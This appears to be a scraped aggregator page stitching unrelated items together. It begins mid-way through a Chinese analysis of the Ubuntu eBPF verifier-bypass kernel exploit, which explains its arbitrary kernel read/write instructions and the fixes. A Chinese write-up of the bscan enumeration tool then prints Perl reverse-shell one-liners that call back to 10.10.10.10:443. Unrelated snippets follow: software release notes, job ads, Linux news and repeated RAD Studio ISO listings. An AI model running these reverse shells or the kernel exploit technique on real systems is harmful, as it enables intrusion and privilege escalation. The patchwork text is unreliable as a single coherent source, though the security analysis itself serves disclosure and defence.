这样因为eBPF的检测逻辑和运行时逻辑不一致,我们就绕过了verifier。后续的指令就是配合用户态exp完成对kernel内存的读写。

这里还需要知道下eBPF的map机制,eBPF为了用户态更高效的与内核态交互,设计了一套map机制,用户态程序和eBPF程序都可以对map区域的内存进行读写,交换数据。利用代码中,就是利用map机制,完成用户态程序与eBPF程序的交互。

ins4-ins5: regs[9] = struct bpf_map *map,得到用户态程序申请的map的地址,注意这2条指令,笔者的静态解析并不准确,获取map指针的指令,在eBPF verifier中,会对指令内容进行修改,替换map指针的值。 ins6-ins12: 调用bpf_map_lookup_elem(map, &key),返回值为regs[0] = &map->value[0] ins13: regs[6] = *regs[0], regs[6]得到map中key=0的value值 ins14-ins20: 继续调用bpf_map_lookup_elem(map, &key),regs[0] = &map->value[1] ins21: regs[7] = *regs[0],regs[7]得到map中key=1的value值 ins22-ins28: 继续调用bpf_map_lookup_elem(map, &key),regs[0] = &map->value[2] ins29: regs[8] = *regs[0],regs[8]得到map中key=2的value值 ins30: regs[2] = regs[0] ins32: if(regs[6] != 0) jmp ins32 + 3,根据用户态传入的key值不同,做不同的操作 ins33: regs[3] = *regs[7],读取regs[7]中地址的内容,用户态的read原语,就在这里完成,regs[7]中的地址为用户态传入的任意内核地址 ins34: *regs[2] = regs[3],把上调指令读取的值返回给用户态 ins36: if(regs[6] != 1) jmp ins36 + 2 ins37: *regs[2] = regs[FP], 读取eBPF的运行时栈指针,返回给用户态,注意这个eBPF的栈指针实际上指向bpf_prog_run函数中的一个局部uint64数组,在内核栈上,从这个值可以得到内核栈的基址,这段指令对应用户态的get_fp ins39: *regs[7] = regs[8],向regs[7]中的地址写入regs[8],对应用户态的write原语,regs[7]中的地址为用户态传入的任意内核地址

理解了这段eBPF程序,再看用户态exp就很容易理解了。需要注意的是,eBPF指令中的3个关键点:泄漏FP,读任意kernel地址,写任意kernel地址,在verifier中都是有检查的,但因为开始的2条指令完全绕过了verifier,导致后续的指令长驱直入。

笔者在Ubuntu 14.04上提权成功:这种攻击方式和传统的内存破坏型漏洞不同,不需要做复杂的内存布局,只需要修改用户态传入的数据,就可以达到控制程序指令流的目的,利用的是原有程序的正常功能,会完全绕过现有的各种内存防御机制(SMEP/SMAP等),有一种四两拨千斤的效果。这也是这两年流行的Data-Oriented Attacks,在linux kernel中似乎并不多见。

0×04 漏洞影响范围&修复

因为linux kernel的内核版本众多,对于安全漏洞的影响范围往往并不容易确认,最准确的方式是搞清楚漏洞根因后,从代码层面判断,但这也带来了高成本的问题,快速应急时,我们往往需要尽快确认漏洞影响范围。从前面的漏洞原理来看,笔者大致给一个全面的linux kernel受影响版本:

3.18-4.4所有版本(包括longterm 3.18,4.1,4.4);

<3.18,因内核eBPF还未引入verifier机制,不受影响。

对于大量用户使用的各个发行版,还需要具体确认,因为该漏洞的触发,还需要2个条件

1.Kernel编译选项CONFIG_BPF_SYSCALL打开,启用了bpf syscall;

2./proc/sys/kernel/unprivileged_bpf_disabled设置为0,允许非特权用户调用bpf syscall

而Ubuntu正好满足以上3个条件。关于修复,upstream kernel在3月22日发布的4.4.123版已经修复该漏洞[11][12], Ubuntu官方4月5日也正式发布了安全公告和修复版本[13][14],没有修复的同学可以尽快升级了。

但现在距漏洞Exp公开已经过去20多天了,在漏洞应急时,我们显然等不了这么久,回过头看看当初的临时修复方案:

1.设置/proc/sys/kernel/unprivileged_bpf_disabled为1,也是最简单有效的方式,虽然漏洞仍然存在,但会让exp失效;

2.使用Ubuntu的预发布源,更新Ubuntu 4.4的内核版本,因为是非正式版,其稳定性无法确认。

Vitaly Nikolenko在twitter上公布的Ubuntu预发布源:all 4.4 ubuntu aws instances are vulnerable: echo “deb http://archive.ubuntu.com/ubuntu/ xenial-proposed restricted main multiverse universe” > /etc/apt/sources.list && apt update && apt install linux-image-4.4.0-117-generic

Ubuntu的非正式内核版本,做了哪些修复,我们可以看下补丁的关键内容(注意这是Ubuntu的kernel版本,非upstream):

git diff Ubuntu-lts-4.4.0-116.140_14.04.1 Ubuntu-lts-4.4.0-117.141_14.04.1ALU指令区分了32bit和64bit立即数,同时regs[].imm改为了64bit integer
四两拨千斤:Ubuntu kernel eBPF 0day分析
还增加了一项有意思的检查,把所有的dead_code替换为nop指令,这个明显是针对exp来的,有点类似于exp的mitigation,upstream kernel可能并不一定喜欢这样的修复风格:)
四两拨千斤:Ubuntu kernel eBPF 0day分析
关于这个漏洞,Ubuntu还有一些相关的修复代码,感兴趣的读者,可以自行发掘。 我们再看下upstream kernel 4.4.123的修复,相比之下,要简洁的多,仅有3行代码改动[12]:

当处理32bit ALU指令时,如果imm为负数,直接忽略,认为是UNKNOWN_VALUE,这样也就避免了前面提到的verifer和运行时语义不一致的问题。


四两拨千斤:Ubuntu kernel eBPF 0day分析
另外Android kernel上,bpf sycall是没有启用的,所以不受该漏洞影响。 0×05 引发的思考

我们回顾以下整个漏洞分析过程,有几点值得注意和思考:

1.eBPF作为内核提供的一种强大机制,因为其复杂的过滤机制,稍有不慎,将会引入致命的安全问题,笔者推测后续eBPF可能还会有类似安全漏洞。 2.受限于linux kernel的开发模式及众多版本,安全漏洞的确认和修复可能存在被忽视的情况,出现N day变0 day的场景。 3.Vitaly Nikolenko公布漏洞exp后,有网友就提出了批评,在厂商发布正式补丁前,不应该公布细节。我们暂且不讨论Vitaly Nikolenko的动机,作为一名安全从业者,负责任的披露漏洞是基本守则。 4.笔者所在公司使用的OS是经过专门的团队量身定制,进行了不少的安全加固和冗余组件裁剪,故不受到此次漏洞影响。可见维护一个安全可靠的OS不失为保障大型企业的安全方案之一。

感谢阅读,行文匆忙,如有不正之处,敬请指出。

0×06 参考文档 [1] https://twitter.com/vnik5287/status/974439706896187392 [2] http://cyseclabs.com/exploits/upstream44.c [3] https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=BPF [4] https://www.ibm.com/developerworks/cn/linux/l-lo-eBPF-history/index.html [5] https://www.kernel.org/doc/Documentation/networking/filter.txt [6] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16995 [7] https://bugs.chromium.org/p/project-zero/issues/detail?id=1454&desc=3 [8] http://kernel.ubuntu.com/git/ubuntu/ubuntu-trusty.git/tree/?h=Ubuntu-lts-4.4.0-31.50_14.04.1 [9] https://www.kernel.org/ [10] https://lwn.net/Articles/700530/ [11] https://lwn.net/Articles/749963/ [12] https://lkml.org/lkml/2018/3/19/1499 [13] https://usn.ubuntu.com/3619-1/ [14] https://usn.ubuntu.com/3619-2/

* 本文来自腾讯安全应急响应中心(TSRC) 投稿 ,作者:Tencent Blade Team:Cradmin,转载须注明原文链接及出处。


          f.lux 4.84      Cache   Translate Page      
Versie 4.84 van f.lux is uitgekomen. Dit programma stemt de kleur van het scherm af op de stand van de zon. Zo is het scherm overdag helderder en wanneer de zon ondergaat wordt de kleur 'warmer'. Dit is niet alleen rustiger voor de ogen, het zou zelfs kunnen helpen bij slaapproblemen. Het programma helpt bij het vinden van jouw locatie op aarde, zodat het precies weet wanneer de zon ondergaat. F.lux is beschikbaar voor Windows, Linux, macOS, iOS en Android. De changelog voor deze uitgave ziet er als volgt uit: Version 4.84: Grayscale mode, distraction-free reading This new version of f.lux has a grayscale mode and new key to turn it on: Windows + End. You may already know about Tristan Harris and the Center for Humane Technology. They?ve explained how apps mess with our attention, so even the colors used on our screens are chosen to distract you. At first, we didn?t think this problem would be as bad on the desktop as it is on your phone. The big surprise is how distracting the icons on the top and bottom of your screen are. These icon colors are the kind of thing you see in candy stores and on fire alarms, but we have to ignore them just to get work done. Without those colors, your computer looks more like a magazine that can help you focus on reading or thinking?it feels different, like a sheet of paper. Also, turning your devices to grayscale does not remove blue light, so f.lux will continue to do what it does. In this version, there?s also dusk-to-dawn support for people with Hue lights, so you can put Hue lights outside and use f.lux to turn them off during the day. There are some bugfixes too.
          Java/Linux Developer - CNH Industrial - Saskatoon, SK      Cache   Translate Page      
Each of its brands, including Case IH, New Holland Agriculture, Case and New Holland Construction, FPT Industrial, Capital, and Parts &amp; Service, is a major...
From CNH Industrial - Wed, 08 Aug 2018 23:25:00 GMT - View all Saskatoon, SK jobs
          Jill of the Jungle: The Complete Trilogy (Windows/Mac/Linux Digital Download) Free      Cache   Translate Page      
GOG.com offers *Jill of the Jungle: The Complete Trilogy* (Windows/Mac/Linux Digital Download) to own for *Free*. Thanks Discombobulated Note, this title is DRM-free and Windows, Mac & Linux...
          Sr. DevOps Architect - SGA - OCI Inc. - Saskatoon, SK      Cache   Translate Page      
Experience with Linux and Windows server administration. Eight years of experience in Software Development with an emphasis on DevOps....
From Indeed - Sat, 03 Nov 2018 00:34:35 GMT - View all Saskatoon, SK jobs
          Senior Linux/DevOps Engineer - The Select Group - Martinsburg, WV      Cache   Translate Page      
The position will sit in Martinsburg, WV or New Carrollton, MD for a data center build-out and requires Linux and DevOps experience, scripting experience, and...
From The Select Group - Thu, 01 Nov 2018 20:18:32 GMT - View all Martinsburg, WV jobs
          Cara Install Ubuntu Desktop 18.04 LTS Bionic Beaver      Cache   Translate Page      
Dalam artikel ini kita akan belajar bagaimana menginstall Linux ubuntu 18.04 Desktop Bionic Beaver. Sebelum memulai install linux, sebaiknya anda check terlebih dulu spesifikasi Komputer Anda. Pastikan spec Komputer Anda… Continue reading "Cara Install Ubuntu Desktop 18.04 LTS Bionic Beaver"
          Microsoft Announces First Paid-For $20 Linux Distro for Windows 10 October 2018 Update      Cache   Translate Page      

Microsoft has announced two new Linux distributions for Windows 10 Subsystem for Linux (WSL), including the first paid-for Linux distro called WLinux. WLinux is a Debian-based distro available for $19.99 from Microsoft Store. The company also announced Ubuntu 18.04, which will be available through the Microsoft Store, as well. While Windows 10 October 2018 Update is still […]

The post Microsoft Announces First Paid-For $20 Linux Distro for Windows 10 October 2018 Update by Rafia Shaikh appeared first on Wccftech.


          Linbit and Intel RSD – a New Approach to Data Center Management – Intel Conversations in the Cloud – Episode 155      Cache   Translate Page      
In this Intel Conversations in the Cloud audio podcast: In this episode of Conversations in the Cloud, Philipp Reisner, CEO of Linbit joins us to discuss Linbit and the work they are doing with open-source software for provisioning, replicating, and managing block storage on Linux systems. Philipp talks about Linstor, a management tool for storage [...]
          Linus Torvalds Says Linux 5.0 Comes in 2019, Kicks Off Development of Linux 4.20      Cache   Translate Page      
Linus Torvalds is back from a short vacation to rethink his strategy as the leader of the development of the Linux kernel, and kicked off a new development cycle for the next 6 weeks, this time for Linux kernel 4.20. That’s right, Linux 4.20 is the next kernel coming after Linux 4.19, which was released
          Microsoft working on porting Sysinternals to Linux      Cache   Translate Page      
A Microsoft exec has confirmed yesterday on Twitter that the company’s engineers are working on porting the highly popular Sysinternals software package to Linux. The revelation was made after another Microsoft employee announced hours before that the company had already ported the ProcDump application –that’s part of the bigger Sysinternals collection– to Linux. Mario Hewardt,
          KDE: Window Buttons Applet 0.1, Accessibility, KDE Connect 1.10      Cache   Translate Page      
  • Window Buttons Applet v0.1

    Window Buttons Applet presents its first release to the public. I always wanted to be able to make my top panel to behave as a window titlebar whenever it is needed. To achieve this some special applets are needed and of course specific behavior from the top panel.

  • Accessibility update – Kickoff, Kicker and KWin improvements

    Chrys took up the role of coordinator, fixer and new master of KDE accessibility, which I think is just fantastic. We have been working on what he decided to be most important, mostly chrys fixing issues to make things work with Plasma and screen readers. After getting Orca to read desktop icons he spent quite some time to improve the various start menus.

    With so much fresh energy around I started poking at KWin, which was a bit scary, to be honest. It was fun to read code I hadn’t looked at before. In the end, after I spent a while working on a huge work-around, it turned out that we could enable the task switcher to work with relatively little code added. The main issue was that KWin does really not want to give focus to the task switcher. My first attempt was to write sub-classes of QAccessibleInterface for everything in KWin. That started to work, but during some debugging I realized that KWin was actually creating the regular representations for its UI, it was just not properly announcing them to Orca. Thus I threw away my almost complete prototype. At least I verified that it’s possible to create an entire Qt UI for screen readers only, disconnected from the actual UI. Thanks to QAccessible::installFactory it is nowadays pretty easy to instantiate custom representations (subclasses of QAccessibleInterface).

  • KDE Connect 1.10 Released To Improve The Android Device Integration

    KDE Connect is the interesting project allowing communication/sharing between your KDE desktop and an Android smartphone/tablet whether it be multimedia content, text messages, or files and more. KDE Connect 1.10 further enhances this interesting effort to bridge Android mobile devices to the KDE desktop.

  • Kernel 4.20-rc1 Is Out, KDE Connect Android App 1.10 Released, Linux Mint 19.1 Coming Soon, Microsoft Ported ProcDump to Linux and Neptune Version 5.6 Now Available

    The KDE Connect Android app version 1.10 was released yesterday. Main changes include "mouse input now works with the same speed independent from the phones pixel density"; "the media controller now allows stopping playback"; the "run command supports triggering commands using kdeconnect:// URLs" and more. There are several desktop improvements as well, and the Linux Mobile App has also gained many new features.


          Senior Software Engineer - Java, Linux, Bash      Cache   Translate Page      
CA-Irvine, If you are a Software Engineer with 5-10 years of experience, please read on - For immediate considering, please email your resume to evan.bates@cybercoders.com. Relocation Assistance Available! Top Reasons to Work with Us We are a leading digital content streaming service that allows subscribers to stream and download content straight to their devices. Our unique service allows you to access cont
          IT Support Specialist - Rambus - San Francisco, CA      Cache   Translate Page      
Business Unit Specific Support:. Collaboration Tool support (Skype for Business, Webex, etc). Deep knowledge of Unix/Linux internals administration,...
From Bank of Ireland - Wed, 19 Sep 2018 00:34:49 GMT - View all San Francisco, CA jobs
          Create a functional Rasa UI chatbot demo from a call script example -- 2      Cache   Translate Page      
Create a functional Rasa UI chatbot demo from a phone call script To win this project you should have intermediate or expert knowledge of Rasa NLU and Rasa Core, using a Linux operating system on a server... (Budget: $250 - $750 USD, Jobs: Machine Learning, Natural Language, Software Architecture)
          HalloweenDemoLinux      Cache   Translate Page      
HalloweenDemoLinux
This is the Halloween Demo for our upcoming game Infinitrap : Rehamstered! (Windows Build)
          Embedded Linux Software Engineer – Driver & Middleware - WITEKIO - Bellevue, WA      Cache   Translate Page      
We are present in the automotive, aerospace, smart cities, medical and mobility sectors, along with our partners such as Roche Medical, Texas Instruments,...
From Indeed - Fri, 21 Sep 2018 15:04:10 GMT - View all Bellevue, WA jobs
          Oktober-2018-Update: Microsoft verbessert Windows Subsystem for Linux      Cache   Translate Page      
Es unterstützt erstmals eine kostenpflichtige Linux-Distribution. Sie basiert auf Debian und wurde speziell für das WSL entwickelt. Neu im Microsoft Store sind auch Suse 15 und Suse Linux Enterprise Server 15 für WSL.
          kubuntu 18 en double demarrage avec win10 sur hp nbook restent qq problemes (06-11-2018 19:36)      Cache   Translate Page      
Linux
          bscan:信息收集和服务枚举工具      Cache   Translate Page      
前言

bscan是一个主动信息收集和服务枚举工具。其核心是异步spawn扫描实用程序进程,重利用控制台高亮输出显示的扫描结果和定义的目录结构。

安装

bscan虽然是为了在Kali linux上运行而开发的,但并不是说只支持Kali。只要系统安装了必要的运行环境就可以正常运行。

从PyPI下载最新的打包版本:

pip install bscan

或从版本控制中获取最新版本:

pip install https://github.com/welchbj/bscan/archive/master.tar.gz 基本使用

bscan为我们提供了多种配置选项,你可以根据需要进行调整。以下是一个简单的示例:

$ bscan \
> --max-concurrency 3 \
> --patterns [Mm]icrosoft \
> --status-interval 10 \
> --verbose-status \
> scanme.nmap.org

max-concurrency 3:表示一次运行不超过3个并发扫描子进程

patterns [Mm] icrosoft:定义了一个自定义正则表达式模式,用于高亮显示生成扫描输出中的匹配项

status-interval 10:告诉bscan每10秒打印一次运行时状态更新

verbose-status:表示每个状态更新都将打印所有当前运行的扫描子进程的详细信息

scanme.nmap.org:想要枚举的主机

bscan还依赖于一些额外的配置文件。默认文件可以在bscan/configuation目录中找到,这些文件的主要用途如下:

patterns.txt : 指定与扫描输出匹配时在控制台输出中高亮显示的正则表达式模式

required-programs.txt : 指定bscan计划使用的已安装程序

port-scans.toml : 定义在目标上运行的端口发现扫描,以及用于从扫描输出中解析端口号和服务名的正则表达式

service-scans.toml : 定义在目标上运行的扫描

bscan所有可用选项介绍:

usage: bscan [OPTIONS] targets
_
| |__ ___ ___ __ _ _ __
| '_ \/ __|/ __/ _` | '_ \
| |_) \__ \ (__ (_| | | | |
|_.__/|___/\___\__,_|_| |_|
an asynchronous service enumeration tool
positional arguments:
targets 要执行枚举的目标和/或网络
optional arguments:
-h, --help 显示帮助信息并退出
--brute-pass-list F 用于执行爆破的密码列表文件名
--brute-user-list F 用于执行爆破的用户列表文件名
--cmd-print-width I 当打印用于spawn一个正在运行子进程命令所允许的最大整数字符数(默认为80)
--config-dir D 从中加载配置文件的基目录; 这个目录中缺少的必要配置文件将从该程序附带的默认文件中加载
--hard 强制覆盖现有目录
--max-concurrency I 允许同时运行的最大整数子进程数(默认为20)
--no-program-check 禁用检查是否存在所需的系统程序
--no-file-check 禁用检查是否存在文件例如已配置的wordlists文件
--no-service-scans 禁用对已发现服务运行扫描
--output-dir D 写入输出文件的基目录
--patterns [ [ ...]] 要在输出文本中高亮显示的正则表达式模式
--ping-sweep 在运行更密集的扫描之前,从网络范围启用ping扫描过滤主机
--quick-only 是否只运行快速扫描(不包括对所有端口的彻底扫描)
--qs-method S 执行初始TCP端口扫描,必须对应于已配置的端口扫描
--status-interval I 打印状态更新之间暂停的整数秒数; 非正值会禁用更新(默认为30)
--ts-method S 执行彻底TCP端口扫描,必须对应于已配置的端口扫描
--udp 是否运行UDP扫描
--udp-method S 执行UDP端口扫描,必须对应于已配置的端口扫描
--verbose-status 是否根据`--status-interval`参数指定的频率,打印详细的运行时状态更新
--version 版本信息
--web-word-list F 用于扫描的字典列表

bscan中包含了两个主要的实用程序(bscan-wordlists和bscan-shells)。bscan-wordlists是一个用于在Kali Linux上查找wordlist文件的程序。它会搜索一些默认目录,并允许glob文件名匹配。以下是一个简单的使用示例:

$ bscan-wordlists --find "*win*"
/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
/usr/share/wordlists/metasploit/sensitive_files_win.txt
/usr/share/seclists/Passwords/common-passwords-win.txt

有关更多参数选项可以通过bscan-wordlists help来查看。

bscan-shells可根据你提供的目标地址和端口,为你生成各种类型的反向shell。以下是一个简单的示例,列出了所有基于Perl的shell,并被配置为回连10.10.10.10的443端口。

$ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
perl for windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl with /bin/sh
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl without /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

注:bscan-shells使用的这些命令是从reverse-shells.toml配置文件中提取的。有关更多参数选项可以通过bscan-shells help命令查看。

视频演示: https://asciinema.org/a/207654?autoplay=1&speed=2

开发

首先,设置一个新的开发环境以及安装依赖项(使用 virtualenvwrapper / virtualenvwrapper-win ):

# setup the environment
mkvirtualenv -p $(which python3) bscan-dev
workon bscan-dev
# get the deps
pip install -r dev-requirements.txt

Lint和项目类型检查(这些也运行在 Travis ):

flake8 . && mypy bscan

打包新版本:

# build source and wheel distributions
python setup.py bdist_wheel sdist
# run post-build checks
twine check dist/*
# upload to PyPI
twine upload dist/*

*参考来源: GitHub ,FB小编secist编译,转载请注明来自CodeSec.Net


          Fedora cumple 15 años      Cache   Translate Page      
Fedora cumple 15 años. La distribución comunitaria de Red Hat echó a andar hace hoy tres lustros y desde entonces, con sus más y sus menos, se ha convertido en una de las distribuciones Linux más populares del panorama. Os[...]
          Windows 10 October 2018 Update trae novedades para WSL      Cache   Translate Page      
Que no te explote la cabeza: en MuyLinux también hablamos de Windows, sobre todo desde que el sistema de Microsoft lleva dentro un poquito de Linux. Se trata de una referencia directa a Windows Subsystem for Linux (WSL), disponible de[...]
          Linux 5 llegará a principios de 2019      Cache   Translate Page      
Por si alguien no se ha enterado, hace un par de semanas que Linus Torvalds volvió a sus labores al frente de Linux y en ello está, coordinando el desarrollo de la próxima versión del kernel, después de que Greg[...]
          PING: Manjaro, Linux Lite, Feren OS, Kali Linux, Parrot, Tails, Super Grub2 Disk…      Cache   Translate Page      
Vamos con un PING dominguero in extremis, como se puede deducir por el titular, dedicado casi por entero a lanzamientos recientes de distros que no hemos llegado a recoger. Por si a alguien le interesa, hay novedades como… Manjaro 18.[...]
          GSA accounts: RAD Studio, Delphi, C++Builder 10.2.3 Inline ISO      Cache   Translate Page      
This ISO is for GSA accounts only. If you are not a GSA customer, please find your ISO at <a href="http://cc.embarcadero.com/item/30842">http://cc.embarcadero.com/item/30842</a>.<p>ISO for RAD Studio, Delphi and C++Builder 10.2 Release 3 Inline <p>RAD Studio 10.2.3 Tokyo, build 3231 is available for installation. It is an update of Delphi 10.2 Tokyo, C++Builder 10.2 Tokyo, and RAD Studio 10.2 Tokyo available for any active Update Subscription customer. If you have already installed 10.2.3 released in March 2018, installing build 3231 will require a full uninstall and reinstall.<p>This release includes the following 10.2 Tokyo patches and hotfixes:<p><ul><li>RAD Server 10.2.3 Performance Patch (July 13th, 2018)</li><li>iOS 11.3 and CodeInsight Patch (June 26th, 2018)</li><li>Delphi - RAD Server Linux Apache Patch (May 17th, 2018)</li><li>iOS 11.3 Patch (May 8th, 2018)</li><li>C++Builder - C++ Compiler 4k Stack Allocation Patch (April 17th, 2018)</li><li>Context Help Patch (April 9th, 2018)</li><li>EMS Package Wizard Patch (March 27th, 2018)</li><li>Android Push Notification Patch (March 27th, 2018)</li></ul>Note: If you have already installed the patches listed above on top of your existing RAD Studio 10.2.3 Tokyo installation (build 2631), you do not need to install the updated 10.2.3 build (build 3231).<p>See <a href="http://docwiki.embarcadero.com/RADStudio/Tokyo/en/10.2_Tokyo_-_Release_3" target=_blank>the release notes</a> for more details.<p>English, French, German and Japanese<p>A Double Layer (dual layer) high capacity DVD is required for burning a physical disc.<p><b>Note</b>: Installing RAD Studio 10.2.3 using this ISO installation requires that you first uninstall your existing RAD Studio 10.2 Tokyo installation. To perform an uninstall, navigate to Add or Remove Programs in your Windows Control Panel. As part of the uninstall process, you will be able to preserve your configuration settings. Those settings can be imported as part of the new 10.2.2 installation.<p>MD5: ECE3015BEDBC4950C69D6AC5EDA6B9B0
          GSA accounts: RAD Studio, Delphi, C++Builder 10.2.3 Inline ISO      Cache   Translate Page      
This ISO is for GSA accounts only. If you are not a GSA customer, please find your ISO at <a href="http://cc.embarcadero.com/item/30840">http://cc.embarcadero.com/item/30840</a>.<p>ISO for RAD Studio, Delphi and C++Builder 10.2 Release 3 Inline<p>RAD Studio 10.2.3 Tokyo, build 3231 is available for installation. It is an update of Delphi 10.2 Tokyo, C++Builder 10.2 Tokyo, and RAD Studio 10.2 Tokyo available for any active Update Subscription customer. If you have already installed 10.2.3 released in March 2018, installing build 3231 will require a full uninstall and reinstall.<p>This release includes the following 10.2 Tokyo patches and hotfixes:<p><ul><li>RAD Server 10.2.3 Performance Patch (July 13th, 2018)</li><li>iOS 11.3 and CodeInsight Patch (June 26th, 2018)</li><li>Delphi - RAD Server Linux Apache Patch (May 17th, 2018)</li><li>iOS 11.3 Patch (May 8th, 2018)</li><li>C++Builder - C++ Compiler 4k Stack Allocation Patch (April 17th, 2018)</li><li>Context Help Patch (April 9th, 2018)</li><li>EMS Package Wizard Patch (March 27th, 2018)</li><li>Android Push Notification Patch (March 27th, 2018)</li></ul>Note: If you have already installed the patches listed above on top of your existing RAD Studio 10.2.3 Tokyo installation (build 2631), you do not need to install the updated 10.2.3 build (build 3231).<p>See <a href="http://docwiki.embarcadero.com/RADStudio/Tokyo/en/10.2_Tokyo_-_Release_3" target=_blank>the release notes</a> for more details.<p>If this is your first time installing 10.2 and you ran into problem, you can also get the ISO at <a href="http://cc.embarcadero.com/item/30844">http://cc.embarcadero.com/item/30844</a>.<p>English, French, German and Japanese<p>A Double Layer (dual layer) high capacity DVD is required for burning a physical disc.<p><b>Note</b>: Installing RAD Studio 10.2.3 using this ISO installation requires that you first uninstall your existing RAD Studio 10.2 Tokyo installation. To perform an uninstall, navigate to Add or Remove Programs in your Windows Control Panel. As part of the uninstall process, you will be able to preserve your configuration settings. Those settings can be imported as part of the new 10.2.2 installation.<p>MD5: ECE3015BEDBC4950C69D6AC5EDA6B9B0
          RAD Studio, Delphi, C++Builder 10.2 Release 3 Inline ISO      Cache   Translate Page      
ISO for RAD Studio, Delphi, C++Builder 10.2 Release 3 Inline<p>RAD Studio 10.2.3 Tokyo, build 3231 is available for installation. It is an update of Delphi 10.2 Tokyo, C++Builder 10.2 Tokyo, and RAD Studio 10.2 Tokyo available for any active Update Subscription customer. If you have already installed 10.2.3 released in March 2018, installing build 3231 will require a full uninstall and reinstall.<p>This release includes the following 10.2 Tokyo patches and hotfixes:<p><ul><li>RAD Server 10.2.3 Performance Patch (July 13th, 2018)</li><li>iOS 11.3 and CodeInsight Patch (June 26th, 2018)</li><li>Delphi - RAD Server Linux Apache Patch (May 17th, 2018)</li><li>iOS 11.3 Patch (May 8th, 2018)</li><li>C++Builder - C++ Compiler 4k Stack Allocation Patch (April 17th, 2018)</li><li>Context Help Patch (April 9th, 2018)</li><li>EMS Package Wizard Patch (March 27th, 2018)</li><li>Android Push Notification Patch (March 27th, 2018)</li></ul>Note: If you have already installed the patches listed above on top of your existing RAD Studio 10.2.3 Tokyo installation (build 2631), you do not need to install the updated 10.2.3 build (build 3231).<p>A Double Layer (dual layer) high capacity DVD is required for burning a physical disc.<p>Available only to registered users of Delphi, C++Builder, RAD Studio 10.2, and Embarcadero All-Access XE<p>English, French, German and Japanese<p><b>Note</b>: Installing RAD Studio 10.2.3 using this ISO installation requires that you first uninstall your existing RAD Studio 10.2 Tokyo installation. To perform an uninstall, navigate to Add or Remove Programs in your Windows Control Panel. As part of the uninstall process, you will be able to preserve your configuration settings. Those settings can be imported as part of the new 10.2.3 installation.<p>MD5: 40D693B9989F7CCDF07C07EA676D1AB2
          RAD Studio, Delphi, C++Builder 10.2 Release 3 Inline ISO      Cache   Translate Page      
ISO for RAD Studio, Delphi, C++Builder 10.2 Release 3 Inline<p>RAD Studio 10.2.3 Tokyo, build 3231 is available for installation. It is an update of Delphi 10.2 Tokyo, C++Builder 10.2 Tokyo, and RAD Studio 10.2 Tokyo available for any active Update Subscription customer. If you have already installed 10.2.3 released in March 2018, installing build 3231 will require a full uninstall and reinstall.<p>This release includes the following 10.2 Tokyo patches and hotfixes:<p><ul><li>RAD Server 10.2.3 Performance Patch (July 13th, 2018)</li><li>iOS 11.3 and CodeInsight Patch (June 26th, 2018)</li><li>Delphi - RAD Server Linux Apache Patch (May 17th, 2018)</li><li>iOS 11.3 Patch (May 8th, 2018)</li><li>C++Builder - C++ Compiler 4k Stack Allocation Patch (April 17th, 2018)</li><li>Context Help Patch (April 9th, 2018)</li><li>EMS Package Wizard Patch (March 27th, 2018)</li><li>Android Push Notification Patch (March 27th, 2018)</li></ul>Note: If you have already installed the patches listed above on top of your existing RAD Studio 10.2.3 Tokyo installation (build 2631), you do not need to install the updated 10.2.3 build (build 3231).<p>See <a href="http://docwiki.embarcadero.com/RADStudio/Tokyo/en/10.2_Tokyo_-_Release_3" target=_blank>the release notes</a> for more details.<p>If this is your first time installing 10.2 and you ran into problem, you can also get the ISO at<br><a href="http://cc.embarcadero.com/item/30842">http://cc.embarcadero.com/item/30842</a>.<p>A Double Layer (dual layer) high capacity DVD is required for burning a physical disc.<p>Available only to registered users of Delphi, C++Builder, RAD Studio 10.2, and Embarcadero All-Access XE<p>English, French, German and Japanese <p>RAD Studio 10.2 also includes HTML5 Builder. That software is not included on this ISO. The HTML5 Builder .zip that can be burned to disc is available at <a href="http://cc.embarcadero.com/item/29545">http://cc.embarcadero.com/item/29545</a>.<p><b>Note</b>: Installing RAD Studio 10.2.3 using this ISO installation requires that you first uninstall your existing RAD Studio 10.2 Tokyo installation. To perform an uninstall, navigate to Add or Remove Programs in your Windows Control Panel. As part of the uninstall process, you will be able to preserve your configuration settings. Those settings can be imported as part of the new 10.2.3 installation.<p>MD5: 40D693B9989F7CCDF07C07EA676D1AB2
          RAD Studio, Delphi, C++Builder 10.2 Release 3 Inline Web Install      Cache   Translate Page      
Web Installer for RAD Studio, Delphi, C++Builder 10.2 Release 3 inline<p>RAD Studio 10.2.3 Tokyo, build 3231 is available for installation. It is an update of Delphi 10.2 Tokyo, C++Builder 10.2 Tokyo, and RAD Studio 10.2 Tokyo available for any active Update Subscription customer. If you have already installed 10.2.3 released in March 2018, installing build 3231 will require a full uninstall and reinstall.<p>This release includes the following 10.2 Tokyo patches and hotfixes:<p><ul><li>RAD Server 10.2.3 Performance Patch (July 13th, 2018)</li><li>iOS 11.3 and CodeInsight Patch (June 26th, 2018)</li><li>Delphi - RAD Server Linux Apache Patch (May 17th, 2018)</li><li>iOS 11.3 Patch (May 8th, 2018)</li><li>C++Builder - C++ Compiler 4k Stack Allocation Patch (April 17th, 2018)</li><li>Context Help Patch (April 9th, 2018)</li><li>EMS Package Wizard Patch (March 27th, 2018)</li><li>Android Push Notification Patch (March 27th, 2018)</li></ul>Note: If you have already installed the patches listed above on top of your existing RAD Studio 10.2.3 Tokyo installation (build 2631), you do not need to install the updated 10.2.3 build (build 3231).<p>English, French, German and Japanese<p>Available only to registered users of RAD Studio, Delphi, C++Builder 10.2 and All-Access<p>MD5: E10A2E9CCD3AC98EF9869109E3C82329
          RAD Studio, Delphi, C++Builder 10.2 Release 3 Inline Web Install      Cache   Translate Page      
